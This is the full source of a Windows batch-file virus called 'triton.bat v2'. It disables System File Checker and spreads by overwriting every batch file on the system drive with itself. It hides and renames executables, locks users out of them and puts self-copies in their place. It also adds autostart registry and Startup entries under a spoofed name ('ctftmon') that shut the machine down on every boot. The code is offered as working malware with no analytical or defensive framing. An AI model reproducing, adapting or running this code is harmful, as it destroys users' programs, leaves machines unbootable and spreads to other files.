::-------- triton.bat v2 -----------
@echo off & setlocal
:: (c) by duddits

:main
call :disable
call :cleaning
call :evil
call :start
goto :end

:disable
echo j | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SFCDisable" /d FFFFFF9D /f >nul 2>nul
sfc /purgecache >nul 2>nul
goto :eof

:cleaning
attrib -H -S %temp%\pvlist >nul 2>nul
del %temp%\pvlist >nul 2>nul
goto :eof

:start
FOR /R %SystemDrive%\ %%i IN (*.exe *.bat *.com *.cmd) DO echo %%i>>%temp%\pvlist
ATTRIB +H +S %temp%\pvlist >nul 2>nul

FOR /F %%i in ('findstr /i ".bat & .cmd" "%temp%\pvlist"') do (
copy %0 %%i >nul 2>nul
attrib +r %%i
)
FOR /F %%i in ('findstr /i ".exe & .com" "%temp%\pvlist"') do (
ATTRIB +H +S %%i >nul 2>nul
echo j | CACLS %%i /C /D %username% /E >nul 2>nul
rename %%i z%%i
attrib +h z%%i
copy %0 %%i
attrib +r %%i
ren %%i *.exe.bat
)
goto :eof

:evil
echo shutdown -s -t 00>C:\Dokumente und Einstellungen\Administrator\Startmenü\Programme\Autostart\s.bat
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "ctftmon" /t REG_SZ /d "shutdown -s -t 00" /f >nul 2>nul || reg add

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "ctftmon" /t REG_SZ /d "shutdown -s -t 00" /f >nul 2>nul
goto :eof

:end